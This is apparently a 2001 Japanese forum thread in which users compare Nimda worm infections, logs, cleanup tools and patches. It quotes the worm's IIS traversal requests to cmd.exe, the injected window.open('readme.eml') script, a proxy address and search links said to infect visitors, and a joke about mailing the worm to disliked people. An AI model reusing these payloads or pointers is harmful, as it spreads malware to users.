スキャンしに行くので。Nimdaも。CodeRedIIもね。

641 :名無しさん@お腹いっぱい。:01/09/20 01:29
MacでWindows用のプログラムが動くわけねーだろ。

642 :名無しさん@お腹いっぱい。:01/09/20 01:30
Macがファイルサーバになったというだけで
「感染した」とは言わないよな。きっと。

643 :491:01/09/20 01:30
>>637
いわねぇ

644 :名無しさん@お腹いっぱい。:01/09/20 01:31
家のは今のところのチェックでは平気だったが
さっき知ったのばかりなので会社のが心配だよ・・・
今日、何か急にマシンが重くなっていたから
気になっていたんだが・・・
誰も気がつかないうちの会社は逝ってよし・・・

645 :623:01/09/20 01:32
>>640
うん、読みに行くYO

646 :623:01/09/20 01:34
>>640
でも、これも明らかにテロだよね。
みんな法律的に逮捕できんのかなあ。
自衛隊のことなんてやってる場合ではないてのに

647 :名無しさん@お腹いっぱい。:01/09/20 01:37
>>646
テロ?んなわけない。

648 :名無しさん@お腹いっぱい。:01/09/20 01:38
>>646
馬鹿が淘汰されてるだけだ。
法的制裁など不要。

649 :名無しさん@お腹いっぱい。:01/09/20 01:39
>>638
ほかにもWinZip32.exeってのもあったぞ。
WinZipが入ってなければZIPファイルに感染はないってことか

650 :623:01/09/20 01:41
>>647
>>648
オレ的には、被害もないし、
改ざんされた、HP、KOIZUMIのアレもみれたから、
お祭りだけど、かなりの、国的にはかなりの被害額じゃないかな。
ひど過ぎるのは、やだよ、
無料ファイヤーウォールも有料化されちゃわないかな。

651 :名無しさん@お腹いっぱい。:01/09/20 01:45
なんかウチのサーバ、01:25からこっち、
ぱったりとNimdaのアクセスが止んだぞ???

652 :名無しさん@お腹いっぱい。:01/09/20 01:45
これは馬鹿でもチョンでもインターネットなんて戦略を取ってきたPCメーカーへの天誅と考えるべき。

653 :名無しさん@お腹いっぱい。:01/09/20 01:46
駆除終了。
やっと寝れるわい。

654 :名無しさん@お腹いっぱい。:01/09/20 01:47
98系ユーザーは仕方ないにしても、NT系で今回感染しちゃった奴ってコードレッドの大騒ぎんとき何してたんだ?馬鹿としか思えないんだけど。

655 :名無しさん@お腹いっぱい。:01/09/20 01:48
Win98マシンの、C:\Windows\Options\IE401 に
readme.exe あったけど、関係あるかなー?
タイムスタンプは、1997/11/25 12:55:14。
同じディレクトリ内に、同じタイムスタンプのファイルが、いくつかあるし
今日定義ファイルを更新したNAVでウィルススキャンしても、発見されなかったし
大丈夫っぽいけど、気になる・・・・・・。

656 :名無しさん@お腹いっぱい。:01/09/20 01:48
寝てたんじゃないの

657 :623:01/09/20 01:49
>>656
おれもそう思う。

658 :651:01/09/20 01:50
また来始めた。無意味な情報スマソ

659 :名無しさん@お腹いっぱい。:01/09/20 01:51
>>657
うちには8月の初頭から今日まで欠かさずに訪ねてくださるおちゃめな人が来ます。
昨夜あたりから手土産もかわったようです。
どうにかしてくれ。

660 :名無しさん@お腹いっぱい。:01/09/20 01:52
MSNJapanのトップページから「お知らせ」消えちまったわ。
なんつうか・・・凄い会社だよなぁ。まったく。

661 :名無しさん@お腹いっぱい。:01/09/20 01:53
どなたか以下が本当かどうか確認してください。または、既出?

確認方法: win95,98系のみ。

C:\Windows 以下の system.ini をテキストエディタで開きます。
その最初の方の行の
shell=Explorer.exe
というのを見てください。
もしも、その行の後ろに、
load.exe
という文字列が見つかりましたら、感染の疑いがあります。

これが本当なら、私のPCはセーフなんだけどねえ。デマ?

662 :   :01/09/20 01:53
>>649
zipだけじゃないでしょ?・・・

663 :名無しさん@お腹いっぱい。:01/09/20 01:53
MSNjapanの担当者がこれからどうなるのか知りたい

664 :名無しさん@お腹いっぱい。:01/09/20 01:54
NETBIOSがGATEWAYなんとなくマターリした気分。

665 :名無しさん@お腹いっぱい。:01/09/20 01:54
これってちゃんとパッチ当ててJAvascript切って変なファイル開かなきゃ感染しないんだよね?

666 :名無しさん@お腹いっぱい。:01/09/20 01:55
>>661
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
の「システムの改ざん」のとこにも載ってるよ

667 :名無しさん@お腹いっぱい。:01/09/20 01:55
>>661
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
>ワームはsystem.iniを次のように改変することによりシステムをフックします。
>Shell= explorer.exe load.exe -dontrunold

668 :名無しさん@お腹いっぱい。:01/09/20 01:56
漏れも210系だが圧倒的に韓国系が多いぞ。
その辺はかなり大雑把に塞いだから、ほとんどこなくな
ったと思ったらすげー近くのIPから・・・おなじISPだ・・・

IISじゃねーのに何度も来るなー

669 :名無しさん@お腹いっぱい。:01/09/20 01:57
http://www.security.nl/misc/codered-stats/geodist.gif
今年の夏は熱かった。

670 :名無しさん@お腹いっぱい。 :01/09/20 02:00
串アドレス「210.159.190.134」 ポート「80」
これで、http://www.yahoo.co.jp/ を開いたら、面白いモンが見れた。

※ 開くと同時に「Nimda」に感染するから、
  セキュリティ対策に自信がない人は実行しちゃ駄目

671 :名無しさん@お腹いっぱい。:01/09/20 02:00
なんか、スゲェむかついて来たYO。
どうするよ。
こういうときは、総力を結集し・・・
弱者への救済を?

672 :667:01/09/20 02:01
>>666
ケコーンしてくれ

673 :666:01/09/20 02:03
>>672
ヨロコンデ!!

674 :名無しさん@お腹いっぱい。:01/09/20 02:04
悪魔の数字・・・即離婚だな

675 :名無しさん@お腹いっぱい。:01/09/20 02:04
>>666>>667
オメデトウ

676 :名無しさん@お腹いっぱい。:01/09/20 02:04
>>666, >>667
オメデトウ!

677 :666:01/09/20 02:05
>>674
ガ━━Σ(゚д゚lll)━━ン

678 :名無しさん@お腹いっぱい。:01/09/20 02:07
>>265
禿げ同

679 :名無しさん@お腹いっぱい。:01/09/20 02:11
>>672-677
(藁∀藁)

680 :名無しさん@お腹いっぱい。:01/09/20 02:14
ニムダメール来ないなー。
漏れ友達居ないし。

681 :IISやろうが:01/09/20 02:15
相談してきました。俺はApache家ロウなんでよくわからん。
IISのパッチはとっくに当てているものの、admin.dllがc:\へ56KBがいっこ。
wwwroot以下の各フォルダーへ15KBでありこちへ。
ホームページを余所から開くと T*???(?は数字)のファイルがwwwrootへ出来る。
サイズが56KBと0とどちらか。(admin.dllやreadme.exeと同じサイズ)
ちなみにreadme.exe *.eml は一切無しだった。
これって感染マシン?
T*???(?は数字)の仮ファイルらしきものはwwwrootフォルダーのアクセス権を変えたら出来なくなったけど。不安らしい。
再起動であれこれやるみたいだから起動しっぱなし。html文へ追加する癖は一切のコンテンツに追加されていない。nimdaチャッカー希望。
誰かおしえてやってくれ。

682 :名無しさんに接続中…:01/09/20 02:18
まだ立ち上げたばかりの自宅サーバのApachに、思わぬ多数の
お客様達。
リモホでログ取りたいので、Apachの設定でKeepAlive Onにして
DNSの逆引きを掛けているが、210.xxx.xxx.xxxのブロックはほと
んど逆引き出来んね。
lame server on 'xxx.xxx.xxx.210.in-addr.arpa'のエラーばっか、
クラスC以下でも逆引き設定せいよ!

683 :名無しさん@お腹いっぱい。:01/09/20 02:19
>>681
世界の平和の為にアポーンしてください。

684 :名無しさん@お腹いっぱい。 :01/09/20 02:22
mac userだけど、感染する方法は?

685 :名無しさん@お腹いっぱい。:01/09/20 02:22
とりあえずノートンアンチウイルスのトライアルをインストールして
ライブアップデートして特定したら?
そんなのネットにつなげるな!

686 :名無しさん@お腹いっぱい。:01/09/20 02:24
>>684
感染したフリして、手動でメールにreadme.emlを添付して、
いやな奴に送りまくる。

687 :名無しさん@お腹いっぱい。:01/09/20 02:26
>>684
VirtualPCに気を付けろ

688 :初心者です…:01/09/20 02:37
Nimdaに感染したらしいのですが、readme.exeはみあたらず、
感染中に「不正落ち」したのでウイルスは活動してないようです。

それよりも、C:\に、見たこともないtxtファイルが3つほどあります…
どうもウイルスの活動履歴みたいなんですが、なんなんでしょうか?

689 : :01/09/20 02:38
>>688
コピペって貼ってみ。

690 :名無しさん:01/09/20 02:39
感染している奴のディレクトリを除いてみたら、
TFTP******
みたいなファイルがたくさんできていた。

691 :初心者です…:01/09/20 02:40
OEMCleanup:Start
1つめです。
ResetRegistry:Start
ResetRegistry::Software\Microsoft\Windows\CurrentVersion:
ResetRegistry::Software\Microsoft\Windows\CurrentVersion:setup
ResetRegistry::Software\Microsoft\Windows\CurrentVersion\Run:

692 :   :01/09/20 02:40
不安な人は、これ。

感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
 *.emlが大量にHITした際は確定。
 ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
 そうでないときは後者2個を削除して様子を見る。
 といっても後者二つを消したからウイルスが消えるわけではない。
 ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.ワームは活動を開始するとマシン内のc:\Windows\tmpディレクトリに以下のファイルを作成します:
   ・c:\Windows\tmp\mep????.tmp
    (「?」は任意の半角英数字 例:mep1234.tmp)
   ・c:\ADMIN.DLL
この2つのファイルはワームが添付されたメールファイルです。
   ・c:\Windows\tmp\mep????.tmp.exe
    (「?」は任意の半角英数字 例:mep1234.tmp)
このファイルはワーム本体のプログラムファイル。

以上コピペでし

693 :名無しさん@お腹いっぱい。:01/09/20 02:40
2つめです。
FirstRunScreens:Start
SpezialGeninstalls:Start
SpezialGeninstalls:Looking for :C:\WINDOWS\OPTIONS\PREDUP.TAG:
Intl:INTL:0:
GetUserInfo:INIT
VcpClose:About to close
VcpClose:About to End
VcpClose:About to Terminate
DoPreInstallWork:Auditmode :0:
PrepareRunonce:RUNONCE Section:RO_PREINSTALLAPP:
PrepareRunonce:Process :コントロール パネル: :1
PrepareRunonce:Process :[スタート] メニューのプログラム: :1
PrepareRunonce:Process :Windows ヘルプ: :1
PrepareRunonce:Process :MS-DOS プログラムの設定: :1
PrepareRunonce:Process :日付と時刻: :2
PrepareRunonce:Process :アプリケーションの設定: :1
PrepareRunonce:Process :レジストリの追加: :4
PrepareRunonce:Process :INIの編集: :4
PrepareRunonce:Process :所在地情報の入力: :2
PrepareRunonce:RUNONCE Section:RO_MSOTHER:
PrepareRunonce:RUNONCE Section:RO_OEM:
IsKeyEmpty:Start
ProcessInfInstall:File:C:\WINDOWS\OPTIONS\EndUser.INF: Section=:Options:
ProcessInfInstall:Geninstall of File :c:\windows\options\enduser.inf: on section:GI_EndUserRestore: reRet=0
ProcessInfInstall:Geninstall of File :C:\windows\options\enduser.inf: on section:GI_SilentMouseCleanup: reRet=0
VcpClose:About to close
VcpClose:About to End
VcpClose:About to Terminate
IsKeyEmpty:Start
VcpClose:About to close
VcpClose:About to End
VcpClose:About to Terminate
Timer:Start OPKRemoveInstalledNetDevice :124432:
Timer:End OPKRemoveInstalledNetDevice :124452:
CheckRunonceSetup:Start
IsKeyEmpty:Start
IsKeyEmpty:1) Have :日付と時刻: :RUNDLL32.EXE SHELL32.DLL,Control_RunDLL TIMEDATE.CPL,,/f:
CheckRunonceSetup:Check for wrapper =
CheckRunonceSetup:Add wrapper = runonce.exe
FirstRunScreens:Exit:0

694 :333:01/09/20 02:44
>>342
オンラインスキャンするか

スタート→検索→ファイルやフォルダ
で、検索。であったら、直ちに削除。

間違ってたら、フォローよろしく

695 :初心者です…:01/09/20 02:47
3つ目は長すぎてはじかれるので一部です。
NETDI: ClassInstall (0x6 on 0x373e:0x58) on at Enum\Root\Net\0000
NETDI: SetupFlags=51D(SUF_INSETUP)(SUF_FIRSTTIME) BootCount= NetSetupFlags=0 (RETAIL)
NETDI: Examining class Net
NETDI: dif_FirstTimeSetup
NETDI: Setting FirstBootUpgrade=1
NETDI: ChangeLine: No matches found.
NETDI: File Information for c:\windows\SYSTEM\wsock32.dll
NETDI: File not found
NETDI: File Information for c:\windows\WINSOCK.DLL
NETDI: File not found
NETDI: File Information for c:\windows\SYSTEM\WINSOCK.DLL
NETDI: File not found
NETDI: Vxd\Winsock\IrSockets=wsirda.vxd
NETDI: File Information for c:\windows\SYSTEM\wsirda.vxd
NETDI: File not found
NETDI: BackupWSock: Clean install, exiting
NETDI: DetectWSock=0
NETDI: Installing WS2 in the standard locations
NETDI: QueueNdiFileCopy: C:\WININST0.400\wsock32.dll->(LDID 11)wsock32.dll
NETDI: QueueNdiFileCopy: C:\WININST0.400\winsock.dll->(LDID 25)winsock.dll
NETDI: Batch.Display=0
NETDI: SelectMyBestCompatDrv: Found a compatible driver: ダイヤルアップ アダプタ
NETDI: ClassInstall(0x6) end
NETDI: NETDI: lpRegLogConf = 0x0
NETDI: ClassInstall (0x9 on 0x373e:0x58) on at Enum\Root\Net\0000
NETDI: SetupFlags=51D(SUF_INSETUP)(SUF_FIRSTTIME) BootCount= NetSetupFlags=7 (RETAIL)
NETDI: ClassInstall(0x9) end
NETDI: ClassInstall (0xa on 0x373e:0x58) on at Enum\Root\Net\0000
NETDI: SetupFlags=51D(SUF_INSETUP)(SUF_FIRSTTIME) BootCount= NetSetupFlags=7 (RETAIL)
NETDI: ProcessNdiFileQueue: C:\WININST0.400\wsock32.dll -> c:\windows\SYSTEM\wsock32.dll copied file
NETDI: ProcessNdiFileQueue: C:\WININST0.400\winsock.dll -> c:\windows\winsock.dll copied file
NETDI: ChangeLine: No matches found.
NETDI: AddRemoveSetVer fAdd=1
NETDI: ChangeLine: Inserting at anchor "DEVICE=c:\windows\setver.exe"
NETDI: ClassInstall(0xa) end
NETDI: ClassInstall (0xc on 0x373e:0x58) on at Enum\Root\Net\0000
NETDI: SetupFlags=51D(SUF_INSETUP)(SUF_FIRSTTIME) BootCount= NetSetupFlags=7 (RETAIL)
NETDI: ClassInstall(0xc) end

696 :名無しさん@お腹いっぱい。:01/09/20 02:47
>>694
人に教えを請うのに偉そうだなお前
フォローよろしくって何様よ?

697 :名無しさん@お腹いっぱい。:01/09/20 02:49
メール送信機能がある、みたいなことがどっかに書いてあったけど、
バグってない?

全然送られる気配ないんだけど。

Code Blueを上書きして広まってるだけでクライアントサイドでは
特別暴れてないような気がする。
これで感染クライアントがメール投げまくってたら大変なことになっていたと思うぞ。

698 :初心者です…:01/09/20 02:49
マシンの現状は、リソースは多少低下、
emlファイルは原本(?)以外確認できず、
system.iniはshellの部分が改変されています。
ちなみにload.exeは確認できません。

699 :名無しさん@お腹いっぱい。:01/09/20 02:52
あと、ホントに「ウイルス」だったら「感染」しゃってフォーマットからやり直し、は正しいけど、
「ワーム」だったら、とりあえず該当ファイルを根絶やしにしてやればいいだけのような気がする。

ホントに「ウイルス」なの?

700 :   :01/09/20 02:52
>>696
ごめん、
かくスレまちがったみたい

701 :名無しさん@お腹いっぱい。:01/09/20 02:53
関係無いと思うよ>3つのFile
メーカー製のパソコン?ノートの。(irのドライバ入れてるみたいだから)
買ってきて最初の起動時、クラスインストーラでプリインストールのドライバ入れた時の
ログが残ってるだけだと思う。タイムスタンプは見てみた?

ちゃんとしたチェックはオンラインの奴とかほかの書き込みみてくださいにゃの。

702 :701:01/09/20 02:55
あ、>701は>688へのレスね。
もう寝るかぁ・・

703 :名無しさん@お腹いっぱい。:01/09/20 02:56
>>699
もういいかげんにシマンテック

704 :初心者です…:01/09/20 02:56
>>701
有り難うございます。
タイムスタンプは改変できるという噂がありましたので…(汗)
ご迷惑をお掛けしました。申し訳ございません。

705 :名無しさん@お腹いっぱい。:01/09/20 02:56
NImdaって2回ずつ叩いてくる?
CordRedの時は3回ずつだったけど、今回は2回が多い。
せっかく黒氷に溜まりに溜まったログを全部削除して身軽に
なったのにまた増えて来た・・・。

706 :名無しさん@お腹いっぱい。:01/09/20 02:59
log、nimda だけで1日で約1.5MBぐらいですね。感染が拡大すると 3MB ぐらいに
はなるかな?

707 : :01/09/20 03:06
寝る。。。
コレで俺の生産性落ちると日本経済が低迷する。
それこそ、テロリストの思う壺だ。。。

708 :名無しさん@お腹いっぱい。:01/09/20 03:17
>>707
アンタ今良い事言った。

709 :やられ太:01/09/20 03:23
今回このウィルスに感染したのを機にIEをバージョンアップしようと思い、
Ver.6をダウンロードしたのですがインストール出来ずに困っています。

前回のインストールが完了していません。Iternet Explorerのセットアップを実行する前に
コンピュータを再起動して、そのインストールを完了してください。セットアップは終了します。

となってしまいます。どうすればいいんでしょうか?
使っているバージョンは5.00.2920.0000です。

問題のウィルスはオンラインでウィルスバスターを使い一応削除しました。

710 :名無しさん@お腹いっぱい。:01/09/20 03:29
ここ20〜30分
攻撃してこなくなったよ。???

711 :やられ太:01/09/20 03:34
もちろん言われるままに再起動してからインストールしても
同じメッセージが出てしまいます。

712 :クプー :01/09/20 03:35
>>709
前の状態に戻すか、修復インストールしてIE6を入れてみる?

713 :やられ太:01/09/20 03:37
>>712
修復インストールってどうやるんですか?

今、IEをアンインストールしようとしたんですがコントロールパネル→
アプリケーションの追加・削除ではできなかったです。

714 :名無しさん@お腹いっぱい。:01/09/20 03:41
>>709
あー、それってIE4→5の時にもあったよね。
なんかコツが居るんだよね。
確かMicrosoftのサポート検索すると回避策があったと思う。

どっかのフォルダを消したりとかするんだったかと。

715 :名無しさん@お腹いっぱい。:01/09/20 03:42
まだ続々くるよ。

p1063-ipad01daianji.nara.ocn.ne.jp

ホスト名、風流すぎ。だいあんじ、ってのはこれか?
http://www.kintetsu.co.jp/senden/Database/TA-Htm/TA0040.html

716 :名無しさん@お腹いっぱい。:01/09/20 03:44
>>709
そもそもウイルスバスターのオンラインスキャンには、削除機能なんぞ無いと思われ。
てゆーか、削除ツール自体がまだ何処からもリリースされていないと思われ。
ワームファイルを削除したところで、改変食ったファイルはそのままだから
何の解決にもならぬ恐れ大ありと思われ。

しかるに、今更IEのばーぢょんあぷしても無駄と思われ。

717 :名無しさん@お腹いっぱい。:01/09/20 03:46
文末が思われ中毒と思われ

718 :716:01/09/20 03:48
>>717
ほめてくれてありがとうと思われ

719 :名無しさん@お腹いっぱい。:01/09/20 03:52
PL1:
mov 2ch,ドキュン
int 21h
loop PL1

720 :名無しさん@お腹いっぱい。:01/09/20 03:53
削除ツールはどこからもまだ出てない、ていうか、
アンチウイルスソフトでスキャンして、ひっかかったのを削除、
では足らんのかえ?

ホンモノのウイルスだったら、そんなのんきなことをしていては
まにあわないが、メモリに常駐して片っ端から感染、ていう感じでは
ないが。

ていうか、それいぜんに、きのうの今ごろ、メディアプレーヤーが
開きまくってたんだけど、各所に書いてある症状が出ない。
当方、Windwos2000のSP当たってない素のやつ。

721 :名無しさん@お腹いっぱい。:01/09/20 03:59
俺のPC攻撃してくるサーバって
韓国と四国だけなんだけど・・・

722 :名無しさん@お腹いっぱい。:01/09/20 03:59
>>720
とりあえず今のところの削除方法(ノートン使用者向け)

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html

723 :名無しさん@お腹いっぱい。:01/09/20 04:02
Cドライブのウィンドウズフォルダにaim95ってフォルダができてるんだけど。

724 :IE6.0だから心配なし:01/09/20 04:04
Zone Alarmで警告されたから、アクセスしたら、サイトハックされてるよ^^;
http://211.125.162.91

725 :思いっきり感染したんだけど:01/09/20 04:12
こんなのワクチンが出るまで飼ってられるかと思い結局リカバリするはめに。

726 :1000:01/09/20 04:19
C:\Windows\Program files\nimda\の中にある
setup.exeは実行しても害は無いでしょうか?

727 :  :01/09/20 04:24
>>724

728 :IE6.0だから心配なし:01/09/20 04:24
>>726
あると思う

729 :おしい!:01/09/20 04:28
>>726
それ以前にそんなディレクトリは無いと思われ

730 :727:01/09/20 04:29
>>724
ワラタ
でも、USAて書いてあるな。
昨日見た大学のサイトは、コイズミだったのに、
当たり前だが、しっかりwindow.openあるしな。

731 :深夜だから何でもツボ:01/09/20 04:32
>>726
藁タ

732 :   :01/09/20 04:54
県庁とかやられてるYO!!

NIKKEI NETによる被害情報
http://it.nikkei.co.jp/it/sp9/

733 :名無しさん@お腹いっぱい。:01/09/20 05:55
ブラウザのプロクシとしてsquidを通してるんだけど、squid.confに

acl SafeNimda url_regex readme\.eml$
http_access deny SafeNimda

みたいなの追加したら、readme.emlで終わるurlにはアクセスできなくなったので
少しは安全になるかな。

734 :名無しさん@お腹いっぱい。:01/09/20 06:15
今、日経新聞読んでるけど、結構スペース大きくとってる。
しかしこれじゃ勘違いするぞ。つかちゃんと理解して書いてないような。
Win98,MEがブラウザから感染、サーバはIISで感染するって書いてる。

735 :初心者:01/09/20 06:19
すいません、私ネスケ使ってるのですが、ネスケでも関係なくヤバいですか?
過去ログ漁ってたんですが量が多すぎて…。(^^;;

736 :  :01/09/20 06:19
>>734

もっと株は下がるYO

737 :厨房よん:01/09/20 06:22
>>735
オレわかんない。
とりあえず大丈夫なんじゃ?
でも、メールとかで貰うことがあるかな・・・。

738 :初心者:01/09/20 06:27
>>737
なるほど。
メールのほうは添付ファイルは開かないで捨ててしまうので問題無いと思うんですがウェブページのほうは怖いです…

739 :名無しさん@お腹いっぱい。:01/09/20 06:31
>738
変なファイルがダウンロードされてきたら、
捨ててね。

740 :名無しさん@お腹いっぱい。:01/09/20 06:32
>>734
ファイル共有での増殖にも触れてないな、企業にとってなんの役に
もたたん記事だ。ただやばいから気おつけてねって警告には
役に立つか。
>>738
ウイルス付メールを受け取った新たなユーザがOutlook ExpressまたはOutlookを利用し、
かつInternet Explorerのセキュリティホールのパッチが適用されていない場合には、
メールを見る(プレビュー機能)だけでウイルスに感染(ダイレクトアクション)します。
-- 引用元 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm --

741 :超初心者:01/09/20 06:50
IE5.00はどのような対策を取ればいいのでしょうか?

742 :名無したんに接続中・・・:01/09/20 06:54
>>741
IE5.01SP2 か IE5.5SP2 か IE6.0 にアップデート

743 :名無しさん@お腹いっぱい。:01/09/20 07:01
Windows Updateの鯖が感染してたらイイナ

744 :名無しさん@お腹いっぱい。:01/09/20 07:09
普段からWinMXでファイルをたくさん落としていたあほが、
一台で64ファイルも感染していたケースも...。

出所のわからないファイルは、
必ずダウンロード後にウイルスチェックしてください!

745 :神のエイリアス:01/09/20 07:14
ADMINではない・・・・
神経科学分野で使われるNIMDA受容体
NIMDA (N-methyl-D-aspartate) preferringだ愚かな人間達よ・・・

746 :名無しさん@お腹いっぱい。:01/09/20 07:27
現在、IE5.5使用。
IE5.01SP2 か IE5.5SP2 にすべきか悩んでます。
ご教授を。

747 :名無しさん@お腹いっぱい。:01/09/20 07:35
>>746
私はIE6にしたよ

748 :◆/tGmt1rM :01/09/20 07:37
>>356
とりあえず、Nimdaをばらまいているページを
既存のブラクラチェッカにかけてみたらどうなるのかな?

JavaScriptの特定のコードを見つければ、できそうだね。

749 :名無しさん@お腹いっぱい。:01/09/20 07:39
>>747
いろいろソフトが使えなくなりそうでコワイ。

750 :初心者:01/09/20 07:44
>>740
あら、プレビューだけでもヤバいんですね(^^;
私はOutlookじゃなくてBeckyを使っているのですが大丈夫ですかね?

751 :名無しさん@お腹いっぱい。:01/09/20 07:50
>>750
とにかくIEをSP2にアププデート。で、OK!

752 :名無しさん@お腹いっぱい。:01/09/20 07:51
2001/09/20(07:34:49) W-SV 211.125.162.91 [80] 500 284 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/20(07:37:50) W-SV 211.125.162.91 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2001/09/20(07:38:55) W-SV 211.125.162.91 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"

まだまだ来やがる。
サーバーがApache、BlackJumboDog、AN Httpd等なら大丈夫なのか?

ちなみに中から「TROJ_NIMADA.A」ってファイルが出て来た。
readme.emlやreadme.exe等も実行せずに削除すれば大丈夫のようだ。
他サイトではJavaScriptを切れば防げる。

↓このウェブページは改ざんされてreadme.emlをDLさせる様になってます。
www.wamsoft.co.jp/juui/juui.html

見たい、確認した人はJavaScriptを切ってから閲覧してください。
そして、ソースをエディタで開きHTMLの末尾に

<html><script language="JavaScript">

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

</script></html>

とあります。

753 :名無しさん@お腹いっぱい。:01/09/20 08:02
http://search.fresheye.com/?kw=readme.eml+window+open+null+resizable&term=monthly
72件

754 : :01/09/20 08:08
TROJ=トロイ?

755 : :01/09/20 08:12
感染した・・・
けど特に何もないの?
ノートン先生検疫中

756 :名無しさん@お腹いっぱい。:01/09/20 08:17
>>754
うん。トロイ型・・・・・・
ドライブが共有になる・・・・・

757 :名無しさん@お腹いっぱい。:01/09/20 08:21
>>684

MacでWebサイト立ててて、そこWinとファイル共有しろ。

758 :名無しさん@お腹いっぱい。:01/09/20 08:28
BlackJumboDogのログより
2001/09/20(08:20:49) W-SV 211.2[80] 500 267 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/20(08:20:54) W-SV 211.2[80] E200035 " .. が含まれるリクエストは許可されていません。[ 211.221.78.5 "/scripts/..%5c../winnt/system32/cmd.exe" ]"
2001/09/20(08:20:54) W-SV 211.2[80] 500 267 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/20(08:20:59) W-SV 211.2[80] E200035 " .. が含まれるリクエストは許可されていません。[ 211.221.78.5 "/scripts/..%2f../winnt/system32/cmd.exe" ]"
2001/09/20(08:20:59) W-SV 211.2[80] 500 267 "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

かなわんなぁトラフィックスゲ―よ。
ちなみに相手IPは消してあります「211.2xxxxxxxx」

759 :名無しさん:01/09/20 08:43
Macでも感染するのかな

760 :752=756=758:01/09/20 08:46
ブラウザはIE6にすれば防げるみたいだな。
とりあえず何でも試す。
酷いサイトは一ページにJavaScriptが二行も記述されているぞ。
クワバラクワバラ

761 :名無しさん@お腹いっぱい。:01/09/20 08:46
>>660
>MSNJapanのトップページから「お知らせ」消えちまったわ。
> なんつうか・・・凄い会社だよなぁ。まったく。

お知らせそのものは入り口なしで残ってる。
http://help.msn.co.jp/notice.htm

MSがういるす撒いた記念としてミラーしとけ

762 :名無しさん@お腹いっぱい。:01/09/20 08:47
>>759

>>757

763 :名無しさん@お腹いっぱい。:01/09/20 08:48
ニッポンだせーよ(´Д`)

http://www.security.nl/misc/codered-stats/geodist.gif

764 :名無しさん@お腹いっぱい。:01/09/20 08:48
>>759
感染はしないが、共有していたら感染経路にはなる。

765 :名無しさん@お腹いっぱい。:01/09/20 08:51
>>759

Macの鯖が「おまえにニムダうつされた」といわれて訴えられることは可能。

766 :名無しさん@お腹いっぱい。:01/09/20 08:54
>>764

この場合、Macの最新ウイルスチェッカでも発見されないから気をつけろよ

767 :名無しさん@お腹いっぱい。:01/09/20 08:54
情報求む!
現時点で、修復出来るパターンを出してているのはシマンテックだけ?

768 :名無しさん@お腹いっぱい。:01/09/20 08:57
>>761
今後も情報を提供するって言葉は嘘だったのか・・・・
それに、他のサイトが「Nimda」を特集組んでいるのに、何処にも載せていない。

769 :名無しさん@お腹いっぱい。:01/09/20 09:04
>>767
http://www.trendmicro.co.jp/nimda/tool.asp
トレンドマイクロ、今出た

770 :名無しさん@お腹いっぱい。:01/09/20 09:06
>>769
俺も今見つけた!
しかし、トレンドは当初、他のexeファイルに感染しないと嘘書いてたからな〜

771 :名無しさん@お腹いっぱい。:01/09/20 09:08
・シマンテック
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

772 :名無しさん@お腹いっぱい。:01/09/20 09:11
http://www.trendmicro.co.jp/nimda/tool.asp
> HTTP/1.1 Server Too Busy

ヘボい。

773 :名無しさん@お腹いっぱい。:01/09/20 09:16
どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない?

見ただけで勝手に何かを実行するなんて言う考えは
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい(ププ

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。

774 :名無しさん@お腹いっぱい。:01/09/20 09:18
>>773 他でやってくれ。それどろではないのだ。MSが糞なのは
みんなわかってるからさ。

775 :名無しさん@お腹いっぱい。:01/09/20 09:22
>>774
わかってるなら使うな(藁

776 :名無しさん@お腹いっぱい。:01/09/20 09:25
>>773
Windows板に逝って好きなだけ暴れろ!
現実逃避してる奴はこれだからウザイ・・・

ところで、トレンドの修復ツールを実行した奴いるか?
感染したテスト機をすぐに用意できない・・・

777 :名無しさん@お腹いっぱい。:01/09/20 09:26
>>773

>> 1番悪いのは、ビルゲイツです。
>> 商売以外にももうちょっと頭使って下さい(ププ

そんな儲からないことにアタマ使うわけないじゃん。
おまえももっとアタマ使えよ(w

778 :名無しさん@お腹いっぱい。:01/09/20 09:26
>>774
たしかにね、そのとうりだ

だが、そんなOS使ってる俺はもっとバカだな(w

779 :名無しさん@お腹いっぱい。:01/09/20 09:27
>>773はコピペ。

780 :名無しさん@お腹いっぱい。:01/09/20 09:27
>>773
セキュリティホールの無いOSなんて無い。
常にWindowsが狙われるのは普及率が最も高いからだ。

781 :名無しさん@お腹いっぱい。:01/09/20 09:28
>>776

ここのリンク先で感染可能

http://search.fresheye.com/?kw=readme%2eeml&term=weekly

782 :名無しさん@お腹いっぱい。:01/09/20 09:29
>>773 に関するレスはこれで終了!

783 :名無しさん@お腹いっぱい。:01/09/20 09:30
>>780
初心者率も高い

784 :名無しさん@お腹いっぱい。:01/09/20 09:34
>>782

思ったよりサーバーには感染していないな!
現時点で80台か、昨日の朝の時点で約40台、昼過ぎで約60台だったと思う。
流石にCodeRedの時点でSP適用してたサーバーが多いということかな!?

#もちろん実際に検索に引っかからないサーバーも多数あるけどね。

今回はCodeRedの時よりも社内LANの被害が甚大のようだ・・・

785 :名無しさん@お腹いっぱい。:01/09/20 09:45
